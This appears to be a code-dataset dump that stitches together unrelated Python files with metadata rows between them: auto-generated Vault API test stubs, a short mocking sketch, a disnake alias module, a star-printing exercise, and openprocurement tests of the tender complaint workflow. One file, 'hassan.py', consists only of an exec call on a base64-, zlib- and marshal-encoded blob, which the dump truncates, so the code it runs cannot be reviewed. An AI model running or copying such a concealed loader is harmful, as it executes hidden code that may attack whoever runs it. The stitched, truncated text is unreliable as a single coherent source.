def test_post_sys_mfa_method_duo_name(self):
"""Test case for post_sys_mfa_method_duo_name
Defines or updates a Duo MFA method. # noqa: E501
"""
pass
def test_post_sys_mfa_method_okta_name(self):
"""Test case for post_sys_mfa_method_okta_name
Defines or updates an Okta MFA method. # noqa: E501
"""
pass
def test_post_sys_mfa_method_pingid_name(self):
"""Test case for post_sys_mfa_method_pingid_name
Defines or updates a PingID MFA method. # noqa: E501
"""
pass
def test_post_sys_mfa_method_totp_name(self):
"""Test case for post_sys_mfa_method_totp_name
Defines or updates a TOTP MFA method. # noqa: E501
"""
pass
def test_post_sys_mfa_method_totp_name_admin_destroy(self):
"""Test case for post_sys_mfa_method_totp_name_admin_destroy
Deletes the TOTP secret for the given method name on the given entity. # noqa: E501
"""
pass
def test_post_sys_mfa_method_totp_name_admin_generate(self):
"""Test case for post_sys_mfa_method_totp_name_admin_generate
Generates a TOTP secret for the given method name on the given entity. # noqa: E501
"""
pass
def test_post_sys_mounts_path(self):
"""Test case for post_sys_mounts_path
Enable a new secrets engine at the given path. # noqa: E501
"""
pass
def test_post_sys_mounts_path_tune(self):
"""Test case for post_sys_mounts_path_tune
Tune backend configuration parameters for this mount. # noqa: E501
"""
pass
def test_post_sys_namespaces_path(self):
"""Test case for post_sys_namespaces_path
"""
pass
def test_post_sys_plugins_catalog_name(self):
"""Test case for post_sys_plugins_catalog_name
Register a new plugin, or updates an existing one with the supplied name. # noqa: E501
"""
pass
def test_post_sys_plugins_catalog_type_name(self):
"""Test case for post_sys_plugins_catalog_type_name
Register a new plugin, or updates an existing one with the supplied name. # noqa: E501
"""
pass
def test_post_sys_plugins_reload_backend(self):
"""Test case for post_sys_plugins_reload_backend
Reload mounted plugin backends. # noqa: E501
"""
pass
def test_post_sys_policies_acl_name(self):
"""Test case for post_sys_policies_acl_name
Add a new or update an existing ACL policy. # noqa: E501
"""
pass
def test_post_sys_policies_egp_name(self):
"""Test case for post_sys_policies_egp_name
Read, Modify, or Delete an access control policy. # noqa: E501
"""
pass
def test_post_sys_policies_rgp_name(self):
"""Test case for post_sys_policies_rgp_name
Read, Modify, or Delete an access control policy. # noqa: E501
"""
pass
def test_post_sys_policy_name(self):
"""Test case for post_sys_policy_name
Add a new or update an existing policy. # noqa: E501
"""
pass
def test_post_sys_rekey_init(self):
"""Test case for post_sys_rekey_init
Initializes a new rekey attempt. # noqa: E501
"""
pass
def test_post_sys_rekey_update(self):
"""Test case for post_sys_rekey_update
Enter a single master key share to progress the rekey of the Vault. # noqa: E501
"""
pass
def test_post_sys_rekey_verify(self):
"""Test case for post_sys_rekey_verify
Enter a single new key share to progress the rekey verification operation. # noqa: E501
"""
pass
def test_post_sys_remount(self):
"""Test case for post_sys_remount
Move the mount point of an already-mounted backend. # noqa: E501
"""
pass
def test_post_sys_renew(self):
"""Test case for post_sys_renew
Renews a lease, requesting to extend the lease. # noqa: E501
"""
pass
def test_post_sys_renew_url_lease_id(self):
"""Test case for post_sys_renew_url_lease_id
Renews a lease, requesting to extend the lease. # noqa: E501
"""
pass
def test_post_sys_replication_dr_primary_demote(self):
"""Test case for post_sys_replication_dr_primary_demote
"""
pass
def test_post_sys_replication_dr_primary_disable(self):
"""Test case for post_sys_replication_dr_primary_disable
"""
pass
def test_post_sys_replication_dr_primary_enable(self):
"""Test case for post_sys_replication_dr_primary_enable
"""
pass
def test_post_sys_replication_dr_primary_revoke_secondary(self):
"""Test case for post_sys_replication_dr_primary_revoke_secondary
"""
pass
def test_post_sys_replication_dr_primary_secondary_token(self):
"""Test case for post_sys_replication_dr_primary_secondary_token
"""
pass
def test_post_sys_replication_dr_secondary_disable(self):
"""Test case for post_sys_replication_dr_secondary_disable
"""
pass
def test_post_sys_replication_dr_secondary_enable(self):
"""Test case for post_sys_replication_dr_secondary_enable
"""
pass
def test_post_sys_replication_dr_secondary_generate_public_key(self):
"""Test case for post_sys_replication_dr_secondary_generate_public_key
"""
pass
def test_post_sys_replication_dr_secondary_license(self):
"""Test case for post_sys_replication_dr_secondary_license
The path responds to the following HTTP methods. GET / Returns information on the installed license POST Sets the license for the server # noqa: E501
"""
pass
def test_post_sys_replication_dr_secondary_operation_token_delete(self):
"""Test case for post_sys_replication_dr_secondary_operation_token_delete
"""
pass
def test_post_sys_replication_dr_secondary_promote(self):
"""Test case for post_sys_replication_dr_secondary_promote
"""
pass
def test_post_sys_replication_dr_secondary_reindex(self):
"""Test case for post_sys_replication_dr_secondary_reindex
"""
pass
def test_post_sys_replication_dr_secondary_update_primary(self):
"""Test case for post_sys_replication_dr_secondary_update_primary
"""
pass
def test_post_sys_replication_performance_primary_demote(self):
"""Test case for post_sys_replication_performance_primary_demote
"""
pass
def test_post_sys_replication_performance_primary_disable(self):
"""Test case for post_sys_replication_performance_primary_disable
"""
pass
def test_post_sys_replication_performance_primary_enable(self):
"""Test case for post_sys_replication_performance_primary_enable
"""
pass
def test_post_sys_replication_performance_primary_mount_filter_id(self):
"""Test case for post_sys_replication_performance_primary_mount_filter_id
"""
pass
def test_post_sys_replication_performance_primary_revoke_secondary(self):
"""Test case for post_sys_replication_performance_primary_revoke_secondary
"""
pass
def test_post_sys_replication_performance_primary_secondary_token(self):
"""Test case for post_sys_replication_performance_primary_secondary_token
"""
pass
def test_post_sys_replication_performance_secondary_disable(self):
"""Test case for post_sys_replication_performance_secondary_disable
"""
pass
def test_post_sys_replication_performance_secondary_enable(self):
"""Test case for post_sys_replication_performance_secondary_enable
"""
pass
def test_post_sys_replication_performance_secondary_generate_public_key(self):
"""Test case for post_sys_replication_performance_secondary_generate_public_key
"""
pass
def test_post_sys_replication_performance_secondary_promote(self):
"""Test case for post_sys_replication_performance_secondary_promote
"""
pass
def test_post_sys_replication_performance_secondary_update_primary(self):
"""Test case for post_sys_replication_performance_secondary_update_primary
"""
pass
def test_post_sys_replication_primary_demote(self):
"""Test case for post_sys_replication_primary_demote
"""
pass
def test_post_sys_replication_primary_disable(self):
"""Test case for post_sys_replication_primary_disable
"""
pass
def test_post_sys_replication_primary_enable(self):
"""Test case for post_sys_replication_primary_enable
"""
pass
def test_post_sys_replication_primary_revoke_secondary(self):
"""Test case for post_sys_replication_primary_revoke_secondary
"""
pass
def test_post_sys_replication_primary_secondary_token(self):
"""Test case for post_sys_replication_primary_secondary_token
"""
pass
def test_post_sys_replication_recover(self):
"""Test case for post_sys_replication_recover
"""
pass
def test_post_sys_replication_reindex(self):
"""Test case for post_sys_replication_reindex
"""
pass
def test_post_sys_replication_secondary_disable(self):
"""Test case for post_sys_replication_secondary_disable
"""
pass
def test_post_sys_replication_secondary_enable(self):
"""Test case for post_sys_replication_secondary_enable
"""
pass
def test_post_sys_replication_secondary_promote(self):
"""Test case for post_sys_replication_secondary_promote
"""
pass
def test_post_sys_replication_secondary_update_primary(self):
"""Test case for post_sys_replication_secondary_update_primary
"""
pass
def test_post_sys_revoke(self):
"""Test case for post_sys_revoke
Revokes a lease immediately. # noqa: E501
"""
pass
def test_post_sys_revoke_force_prefix(self):
"""Test case for post_sys_revoke_force_prefix
Revokes all secrets or tokens generated under a given prefix immediately # noqa: E501
"""
pass
def test_post_sys_revoke_prefix_prefix(self):
"""Test case for post_sys_revoke_prefix_prefix
Revokes all secrets (via a lease ID prefix) or tokens (via the tokens' path property) generated under a given prefix immediately. # noqa: E501
"""
pass
def test_post_sys_revoke_url_lease_id(self):
"""Test case for post_sys_revoke_url_lease_id
Revokes a lease immediately. # noqa: E501
"""
pass
def test_post_sys_rotate(self):
"""Test case for post_sys_rotate
Rotates the backend encryption key used to persist data. # noqa: E501
"""
pass
def test_post_sys_seal(self):
"""Test case for post_sys_seal
Seal the Vault. # noqa: E501
"""
pass
def test_post_sys_step_down(self):
"""Test case for post_sys_step_down
Cause the node to give up active status. # noqa: E501
"""
pass
def test_post_sys_tools_hash(self):
"""Test case for post_sys_tools_hash
Generate a hash sum for input data # noqa: E501
"""
pass
def test_post_sys_tools_hash_urlalgorithm(self):
"""Test case for post_sys_tools_hash_urlalgorithm
Generate a hash sum for input data # noqa: E501
"""
pass
def test_post_sys_tools_random(self):
"""Test case for post_sys_tools_random
Generate random bytes # noqa: E501
"""
pass
def test_post_sys_tools_random_urlbytes(self):
"""Test case for post_sys_tools_random_urlbytes
Generate random bytes # noqa: E501
"""
pass
def test_post_sys_unseal(self):
"""Test case for post_sys_unseal
Unseal the Vault. # noqa: E501
"""
pass
def test_post_sys_wrapping_lookup(self):
"""Test case for post_sys_wrapping_lookup
Look up wrapping properties for the given token. # noqa: E501
"""
pass
def test_post_sys_wrapping_rewrap(self):
"""Test case for post_sys_wrapping_rewrap
Rotates a response-wrapped token. # noqa: E501
"""
pass
def test_post_sys_wrapping_unwrap(self):
"""Test case for post_sys_wrapping_unwrap
Unwraps a response-wrapped token. # noqa: E501
"""
pass
def test_post_sys_wrapping_wrap(self):
"""Test case for post_sys_wrapping_wrap
Response-wraps an arbitrary JSON object. # noqa: E501
"""
pass
if __name__ == '__main__':
unittest.main()
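Every stub above is a bare `pass`; a sketch of how one might be filled in without a live Vault server, substituting a mock for the generated client (the `get_sys_health` call shape and the response keys are assumptions, not the generated method's guaranteed signature):

```python
import unittest
from unittest import mock


class TestSysHealthExample(unittest.TestCase):
    """Hypothetical fleshed-out counterpart of test_get_sys_health."""

    def setUp(self):
        # Replace the generated SystemApi with a mock so no server or
        # token is needed; configure a body shaped like what Vault's
        # GET /v1/sys/health endpoint returns.
        self.api = mock.Mock()
        self.api.get_sys_health.return_value = {
            'initialized': True,
            'sealed': False,
            'standby': False,
        }

    def test_get_sys_health(self):
        status = self.api.get_sys_health()
        self.assertTrue(status['initialized'])
        self.assertFalse(status['sealed'])


runner = unittest.TextTestRunner(verbosity=0)
result = runner.run(
    unittest.defaultTestLoader.loadTestsFromTestCase(TestSysHealthExample))
```

Using a mock keeps the stubs runnable in CI; swapping in the real client later only changes `setUp`.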
| 27.757235 | 184 | 0.65488 | 4,537 | 34,530 | 4.623981 | 0.069209 | 0.066066 | 0.093856 | 0.127985 | 0.887411 | 0.876114 | 0.857572 | 0.775251 | 0.601697 | 0.413366 | 0 | 0.017103 | 0.283753 | 34,530 | 1,243 | 185 | 27.779566 | 0.83115 | 0.513756 | 0 | 0.486486 | 0 | 0 | 0.00059 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.489189 | false | 0.486486 | 0.013514 | 0 | 0.505405 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
11c17c8e68588618ffac879c5592e2a7ff3e22e7 | 28,624 | py | Python | hassan.py | hassan5542/royal | 4cecd3fcbb2c8631385d5b72c6a9a214dd20420f | [
"BSL-1.0"
] | null | null | null | hassan.py | hassan5542/royal | 4cecd3fcbb2c8631385d5b72c6a9a214dd20420f | [
"BSL-1.0"
] | null | null | null | hassan.py | hassan5542/royal | 4cecd3fcbb2c8631385d5b72c6a9a214dd20420f | [
"BSL-1.0"
] | null | null | null | import marshal,zlib,base64
exec(marshal.loads(zlib.decompress(base64.b64decode("eJzsvdmaotq2MLhOVb1I3dX37YsDqLHSuwoVEBQM6eGOxhSkkQxbuK2Xqoeqd6gaY05QbCIycjX73399a5/jSkNlNmOOfo4m/K353/8Kr/8TXrv/Hf4Twf//12/Zb795v/22+u23zX/9Fv0vv/1f/4Uf/m8m/Ef/P/Dnyf8L/1N3//f/89tvUsUfI0et5pxcBsnwtHK0bcD1q8lyu5FE9eiJ2cGrWTYS3f3ilZlJ1WgTcFoZ5OHaLdK1Lgp1yAkH8nt+cIxEc71IRj9ce1C4dn/tiek6suXYH492rh2Vkj46wHeMr4+ysJCPYXJah5xa+c6IkaZW6trrtWcPYv9E5noLResgTVVYo7zxdDJ3Jk21zLWZ9ffx6OBxQ8a1dzBP9u47y7XLDd8lsYyDPIoDWEdkCztJ1EppCvPlJevap7WbWzvf3sP3r+p4zcx0cbt+018LZ7o+u9nuvKjTKtDD9WRZqtH4dSiNo3A1ERK7Hu3lCp7JASacd5QmzHqGMEmkRHYUdZxMkvVMWuv2IA+qUe325DKcLtcLmEN6TeH7170kCgDLGPb9upbG8Jps134DQwnHGjNrLxc2ni0fA25HfgPwzF1bzdx8ePSrAcCAObZwN/PhwLXPL6phMsqaPm9xcRxN1TicXueYwZ6Umj8rRsiqE/6ktHNxGeNPrYT8js5V+IADkS0dAJb7ORPHYU9FWE5gnQeveS7KrSrksmOQtM+9nucbHvcIL6smMNFjyU/OAMO0BFiWgTM6hsVyHfQAVoVWrYwt/h6eH12+C3PrHNlWHU3hN7nVdznrFI1HMv1eEwjObC7PHcNqUK8clfFsZiv3RmU4kda+PagjUdgF41HlOQLrwfdhFeIamLBIXwBXyZp9mz0FPZlBPA9ylYWxs6BYHrzCYgDfshBw0HPijYe4yWf7UBxWEQ/7zocVOVOEmTis54U6CHtaFujrIhSzk5LAfgoV8PIMuOex0dSCdSjFbMnMoqk8uD7bjDkeJWG9/Cv2i+OQeS57m8I+HCuD9dVz8jzQW27CuuRaHcP7Xoaf/wi54QH+ZeC5DP6tgEZTwDOknTgSrfbzGmj5BPsHmKj43C7gogLmL+B94jpqpm5wH14FzyItHtwewss6RONBHjkaC+/rzr5NH9bn2toy4IY7zYkz+D0T9CSkvRzm2dN1XvFjmVsxjFPCGe1MbsiG41EcVqOT68i150iXuSOYA/jFFa+4c+Y5r2vXUdZ+DnwGYOQBbAN9lLqOlt3/3hMFxoN5AttUx9m34Uw8x4Etp64+6i+KdbngkDeaw2ianTw9/j7PPRZw6DvsOfX09Hengv3ag43T/I5+vj7NJ687VT9xAPtiZWTAV15PnnXuK5MRfS9c3wM/6iss/i2Qv/3s+v7xGeGTZ+QPnpE/eUbt/E59+ruf/U2f1drvTqpgOQGObVvXz0TynsH3irgPyfeTUWVf13q2yWfXZ5rnOfoMec+S9zDfgq71TP7mIynowMwWtetcggI4uy4CWwA+FsfBONwBn38JxCyRgUZkTo5DzoRzIp9nelEy1kZgzSnf91i5H2SjfZD2q1Weua7l+To/dBdi+WKy6jhIhb4/sRSDE+qlKcM5yz3T5nuGpfV9RuYtkc3D1BorG2Grmt+OPrN9t5g1a3LWQWNHpygtDV0cLKNaOAdWLCp1ZsPabW+iVNomGmu1+qKA/JmxKqMWQmGa5WFlaqUuRoK+0X4YrLr0zO37Ut+967bXXzJWbtkuo/aiH3OuPPqF27ed7SAoPN5LzeMyXw7UenTQzYE8Z6zl0lDH5jRiltZ6oE8jcSEofS1XhTmz5ZaON3DzsBdxfWaZ7JVVsRz4G4U1NxG8j0wzEwYhJ0ur8bd339TyhSG8KKbsmBPBDhnNUKfxIiyEuZ1phpKXse3ErGJEfasXi6tCG+hmvIks1Qhr7UUtrB+Bbf3QsnJ
11cf9329ea928f2aec6067bd835fcc530901ad5b | 126 | py | Python | discord/mentions.py | kuzaku-developers/disnake | 61cc1ad4c2bafd39726a1447c85f7e469e41af10 | [
"MIT"
] | null | null | null | discord/mentions.py | kuzaku-developers/disnake | 61cc1ad4c2bafd39726a1447c85f7e469e41af10 | [
"MIT"
] | null | null | null | discord/mentions.py | kuzaku-developers/disnake | 61cc1ad4c2bafd39726a1447c85f7e469e41af10 | [
"MIT"
] | null | null | null | # Alias module: re-export everything from disnake.mentions so this
# module mirrors it exactly, including dunder attributes.
from disnake.mentions import *
from disnake.mentions import __dict__ as __original_dict__
locals().update(__original_dict__)
| 25.2 | 58 | 0.84127 | 16 | 126 | 5.75 | 0.5625 | 0.23913 | 0.413043 | 0.543478 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.095238 | 126 | 4 | 59 | 31.5 | 0.807018 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
e10c50515f9221474465101624735abaf3114932 | 260 | py | Python | 01. FirstStepsInPython/06. SquareOfStars.py | indieza/Python-Developing | f7b5fa7e9ca5d9e8ad30fc7d2a1a21e2ad4b75a4 | [
"MIT"
] | null | null | null | 01. FirstStepsInPython/06. SquareOfStars.py | indieza/Python-Developing | f7b5fa7e9ca5d9e8ad30fc7d2a1a21e2ad4b75a4 | [
"MIT"
] | null | null | null | 01. FirstStepsInPython/06. SquareOfStars.py | indieza/Python-Developing | f7b5fa7e9ca5d9e8ad30fc7d2a1a21e2ad4b75a4 | [
"MIT"
] | null | null | null | # Print a hollow square of stars with side length n.
n = int(input())
# Top border
for x in range(n):
    print("*", end="")
print()
# Middle rows: a star, (n - 2) spaces, a star
for x in range(1, n - 1):
    print("*", end="")
    for y in range(1, n - 1):
        print(" ", end="")
    print("*", end="")
    print()
# Bottom border
for x in range(n):
    print("*", end="")
print()
| 16.25 | 29 | 0.446154 | 40 | 260 | 2.9 | 0.275 | 0.344828 | 0.448276 | 0.284483 | 0.887931 | 0.887931 | 0.887931 | 0.431034 | 0 | 0 | 0 | 0.02139 | 0.280769 | 260 | 15 | 30 | 17.333333 | 0.59893 | 0 | 0 | 0.692308 | 0 | 0 | 0.019231 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.615385 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
010977ba082aca27144ddb4b283faec5973dfc27 | 127,655 | py | Python | docs/tests/test_basic_actions.py | ProzorroUKR/openprocurement.api | 2855a99aa8738fb832ee0dbad4e9590bd3643511 | [
"Apache-2.0"
] | 10 | 2020-02-18T01:56:21.000Z | 2022-03-28T00:32:57.000Z | docs/tests/test_basic_actions.py | quintagroup/openprocurement.api | 2855a99aa8738fb832ee0dbad4e9590bd3643511 | [
"Apache-2.0"
] | 26 | 2018-07-16T09:30:44.000Z | 2021-02-02T17:51:30.000Z | docs/tests/test_basic_actions.py | ProzorroUKR/openprocurement.api | 2855a99aa8738fb832ee0dbad4e9590bd3643511 | [
"Apache-2.0"
] | 15 | 2019-08-08T10:50:47.000Z | 2022-02-05T14:13:36.000Z | # -*- coding: utf-8 -*-
import os
from copy import deepcopy
from openprocurement.api.models import get_now
from openprocurement.tender.openeu.tests.tender import BaseTenderWebTest
from openprocurement.tender.core.tests.base import change_auth
from openprocurement.tender.belowthreshold.tests.base import test_criteria
from openprocurement.api.constants import RELEASE_2020_04_19
from tests.base.constants import DOCS_URL, AUCTIONS_URL
from tests.base.test import DumpsWebTestApp, MockWebTestMixin
from tests.base.data import (
complaint, claim, lots, subcontracting,
bid_draft, bid2, bid3_with_docs,
qualified, tender_openeu, test_eligible_evidence_data,
test_requirement_data, test_requirement_group_data,
test_criterion_data,
)
from tests.base.helpers import complaint_create_pending
test_tender_data = deepcopy(tender_openeu)
test_lots = deepcopy(lots)
bid = deepcopy(bid_draft)
bid2 = deepcopy(bid2)
bid3 = deepcopy(bid3_with_docs)
bid.update(subcontracting)
bid.update(qualified)
bid2.update(qualified)
bid3.update(qualified)
test_lots[0]['value'] = test_tender_data['value']
test_lots[0]['minimalStep'] = test_tender_data['minimalStep']
test_lots[1]['value'] = test_tender_data['value']
test_lots[1]['minimalStep'] = test_tender_data['minimalStep']
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TARGET_DIR = os.path.join(BASE_DIR, 'source/tendering/http/')
class TenderResourceTest(BaseTenderWebTest, MockWebTestMixin):
AppClass = DumpsWebTestApp
relative_to = os.path.dirname(__file__)
initial_data = test_tender_data
docservice = True
docservice_url = DOCS_URL
auctions_url = AUCTIONS_URL
def setUp(self):
super(TenderResourceTest, self).setUp()
self.setUpMock()
def tearDown(self):
self.tearDownMock()
super(TenderResourceTest, self).tearDown()
def test_complaints(self):
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json(
'/tenders?opt_pretty=1',
{'data': test_tender_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
owner_token = response.json['access']['token']
self.tender_id = tender['id']
self.set_status("active.tendering")
with open(TARGET_DIR + 'complaints/claim-submission.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/complaints'.format(self.tender_id),
{'data': claim})
self.assertEqual(response.status, '201 Created')
complaint_token = response.json['access']['token']
complaint_id = response.json['data']['id']
with open(TARGET_DIR + 'complaints/complaint-submission-upload.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/complaints/{}/documents?acc_token={}'.format(self.tender_id, complaint_id,
complaint_token),
{"data": {
"title": "Complaint_Attachment.pdf",
"url": self.generate_docservice_url(),
"hash": "md5:" + "0" * 32,
"format": "application/pdf",
}},
)
self.assertEqual(response.status, '201 Created')
with open(TARGET_DIR + 'complaints/complaint-claim.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint_id, complaint_token),
{"data": {"status": "claim"}})
self.assertEqual(response.status, '200 OK')
claim_data = {'data': claim.copy()}
claim_data['data']['status'] = 'claim'
with open(TARGET_DIR + 'complaints/complaint-submission-claim.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/complaints'.format(self.tender_id), claim_data)
self.assertEqual(response.status, '201 Created')
complaint2_token = response.json['access']['token']
complaint2_id = response.json['data']['id']
complaint_data = {'data': complaint.copy()}
complaint_url = "/tenders/{}/complaints".format(self.tender_id)
complaint3_id, complaint3_token = complaint_create_pending(self, complaint_url, complaint_data)
response = self.app.post_json(
'/tenders/{}/complaints'.format(self.tender_id), claim_data)
self.assertEqual(response.status, '201 Created')
complaint4_id = response.json['data']['id']
complaint4_token = response.json['access']['token']
        with open(TARGET_DIR + 'complaints/complaint-submission.http', 'w') as self.app.file_obj:
            response = self.app.post_json(
                '/tenders/{}/complaints'.format(self.tender_id),
                {'data': complaint})
            self.assertEqual(response.status, '201 Created')

        complaint1_token = response.json['access']['token']
        complaint1_id = response.json['data']['id']

        with open(TARGET_DIR + 'complaints/complaint-complaint.http', 'w') as self.app.file_obj:
            if get_now() < RELEASE_2020_04_19:
                response = self.app.patch_json(
                    '/tenders/{}/complaints/{}?acc_token={}'.format(
                        self.tender_id, complaint1_id, complaint1_token),
                    {"data": {"status": "pending"}})
            else:
                with change_auth(self.app, ("Basic", ("bot", ""))):
                    response = self.app.patch_json(
                        '/tenders/{}/complaints/{}'.format(self.tender_id, complaint1_id),
                        {"data": {"status": "pending"}})
            self.assertEqual(response.status, '200 OK')

        with open(TARGET_DIR + 'complaints/complaint-answer.http', 'w') as self.app.file_obj:
            response = self.app.patch_json(
                '/tenders/{}/complaints/{}?acc_token={}'.format(
                    self.tender_id, complaint2_id, owner_token),
                {'data': {
                    "status": "answered",
                    "resolutionType": "resolved",
                    "resolution": "Виправлено неконкурентні умови"
                }})
            self.assertEqual(response.status, '200 OK')

        response = self.app.patch_json(
            '/tenders/{}/complaints/{}?acc_token={}'.format(
                self.tender_id, complaint4_id, owner_token),
            {'data': {
                "status": "answered",
                "resolutionType": "invalid",
                "resolution": "Вимога не відповідає предмету закупівлі"
            }})
        self.assertEqual(response.status, '200 OK')

        with open(TARGET_DIR + 'complaints/complaint-satisfy.http', 'w') as self.app.file_obj:
            response = self.app.patch_json(
                '/tenders/{}/complaints/{}?acc_token={}'.format(
                    self.tender_id, complaint2_id, complaint2_token),
                {"data": {
                    "satisfied": True,
                    "status": "resolved"
                }})
            self.assertEqual(response.status, '200 OK')

        if get_now() < RELEASE_2020_04_19:
            with open(TARGET_DIR + 'complaints/complaint-escalate.http', 'w') as self.app.file_obj:
                response = self.app.patch_json(
                    '/tenders/{}/complaints/{}?acc_token={}'.format(
                        self.tender_id, complaint4_id, complaint4_token),
                    {"data": {
                        "satisfied": False,
                        "status": "pending"
                    }})
                self.assertEqual(response.status, '200 OK')
        complaint5_id, complaint5_token = complaint_create_pending(self, complaint_url, complaint_data)
        complaint6_id, complaint6_token = complaint_create_pending(self, complaint_url, complaint_data)
        complaint9_id, complaint9_token = complaint_create_pending(self, complaint_url, complaint_data)

        self.app.authorization = ('Basic', ('reviewer', ''))
        with open(TARGET_DIR + 'complaints/complaint-reject.http', 'w') as self.app.file_obj:
            response = self.app.patch_json(
                '/tenders/{}/complaints/{}'.format(self.tender_id, complaint9_id),
                {'data': {
                    "status": "invalid",
                    "rejectReason": "alreadyExists"
                }})
            self.assertEqual(response.status, '200 OK')

        with open(TARGET_DIR + 'complaints/complaint-accept.http', 'w') as self.app.file_obj:
            response = self.app.patch_json(
                '/tenders/{}/complaints/{}'.format(self.tender_id, complaint1_id),
                {'data': {
                    "status": "accepted",
                    "reviewDate": get_now().isoformat(),
                    "reviewPlace": "Place of review"
                }})
            self.assertEqual(response.status, '200 OK')

        # accept the remaining pending complaints the same way
        for accepted_complaint_id in (complaint3_id, complaint5_id, complaint6_id):
            response = self.app.patch_json(
                '/tenders/{}/complaints/{}'.format(self.tender_id, accepted_complaint_id),
                {'data': {
                    "status": "accepted",
                    "reviewDate": get_now().isoformat(),
                    "reviewPlace": "Place of review"
                }})
            self.assertEqual(response.status, '200 OK')
        with open(TARGET_DIR + 'complaints/complaint-resolution-upload.http', 'w') as self.app.file_obj:
            response = self.app.post_json(
                '/tenders/{}/complaints/{}/documents'.format(self.tender_id, complaint1_id),
                {"data": {
                    "title": "ComplaintResolution.pdf",
                    "url": self.generate_docservice_url(),
                    "hash": "md5:" + "0" * 32,
                    "format": "application/pdf",
                }})
            self.assertEqual(response.status, '201 Created')

        with open(TARGET_DIR + 'complaints/complaint-resolve.http', 'w') as self.app.file_obj:
            response = self.app.patch_json(
                '/tenders/{}/complaints/{}'.format(self.tender_id, complaint1_id),
                {'data': {
                    "status": "satisfied"
                }})
            self.assertEqual(response.status, '200 OK')

        with open(TARGET_DIR + 'complaints/complaint-decline.http', 'w') as self.app.file_obj:
            response = self.app.patch_json(
                '/tenders/{}/complaints/{}'.format(self.tender_id, complaint3_id),
                {'data': {
                    "status": "declined"
                }})
            self.assertEqual(response.status, '200 OK')

        with open(TARGET_DIR + 'complaints/complaint-accepted-stopped.http', 'w') as self.app.file_obj:
            response = self.app.patch_json(
                '/tenders/{}/complaints/{}'.format(self.tender_id, complaint5_id),
                {'data': {
                    "decision": "Тендер скасовується замовником",
                    "status": "stopped",
                    "rejectReason": "tenderCancelled"
                }})
            self.assertEqual(response.status, '200 OK')
        self.app.authorization = ('Basic', ('broker', ''))
        with open(TARGET_DIR + 'complaints/complaint-resolved.http', 'w') as self.app.file_obj:
            response = self.app.patch_json(
                '/tenders/{}/complaints/{}?acc_token={}'.format(
                    self.tender_id, complaint1_id, owner_token),
                {'data': {
                    "tendererAction": "Умови виправлено",
                    "status": "resolved"
                }})
            self.assertEqual(response.status, '200 OK')

        if get_now() < RELEASE_2020_04_19:
            with open(TARGET_DIR + 'complaints/complaint-accepted-stopping.http', 'w') as self.app.file_obj:
                response = self.app.patch_json(
                    '/tenders/{}/complaints/{}?acc_token={}'.format(
                        self.tender_id, complaint6_id, complaint6_token),
                    {"data": {
                        "cancellationReason": "Тендер скасовується замовником",
                        "status": "stopping"
                    }},
                    status=200,
                )
                self.assertEqual(response.status, '200 OK')

            self.app.authorization = ('Basic', ('reviewer', ''))
            with open(TARGET_DIR + 'complaints/complaint-stopping-stopped.http', 'w') as self.app.file_obj:
                response = self.app.patch_json(
                    '/tenders/{}/complaints/{}'.format(self.tender_id, complaint6_id),
                    {'data': {
                        "decision": "Тендер скасовується замовником",
                        "status": "stopped",
                        "rejectReason": "tenderCancelled"
                    }})
                self.assertEqual(response.status, '200 OK')
        else:
            with open(TARGET_DIR + 'complaints/complaint-accepted-stopping-2020-04-19.http', 'w') as self.app.file_obj:
                response = self.app.patch_json(
                    '/tenders/{}/complaints/{}?acc_token={}'.format(
                        self.tender_id, complaint6_id, complaint6_token),
                    {"data": {
                        "cancellationReason": "Тендер скасовується замовником",
                        "status": "stopping"
                    }},
                    status=403,
                )
                self.assertEqual(response.status, '403 Forbidden')
        if get_now() < RELEASE_2020_04_19:
            # before RELEASE_2020_04_19 the pending -> mistaken transition was performed by the reviewer
            self.app.authorization = ('Basic', ('broker', ''))
            complaint7_id, complaint7_token = complaint_create_pending(self, complaint_url, complaint_data)

            with open(TARGET_DIR + 'complaints/complaint-mistaken.http', 'w') as self.app.file_obj:
                self.app.authorization = ('Basic', ('reviewer', ''))
                response = self.app.patch_json(
                    '/tenders/{}/complaints/{}?acc_token={}'.format(
                        self.tender_id, complaint7_id, complaint7_token),
                    {"data": {"status": "mistaken"}},
                )
                self.assertEqual(response.status, '200 OK')
        else:
            # since RELEASE_2020_04_19 the draft -> mistaken transition is performed by the complainant
            self.app.authorization = ('Basic', ('broker', ''))
            response = self.app.post_json(
                '/tenders/{}/complaints'.format(self.tender_id),
                {'data': complaint})
            self.assertEqual(response.status, '201 Created')
            complaint7_id = response.json['data']['id']
            complaint7_token = response.json['access']['token']

            with open(TARGET_DIR + 'complaints/complaint-mistaken-2020-04-19.http', 'w') as self.app.file_obj:
                response = self.app.patch_json(
